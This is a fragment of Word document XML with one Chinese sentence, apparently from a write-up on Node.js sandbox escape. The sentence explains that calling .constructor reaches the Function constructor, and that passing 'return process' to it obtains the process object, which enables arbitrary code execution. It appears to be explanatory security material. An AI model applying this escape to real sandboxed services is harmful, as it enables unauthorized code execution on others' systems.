        <w:t xml:space="preserve">，再次通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.constructor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">就可以获取到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">function Function()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">对象，通过该构造函数传入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"return process"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">就可以获取到 nodejs 的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">对象，从而实现接下来的任意代码执行工作。</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2023-06-02T07:08:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-02T07:08:33Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>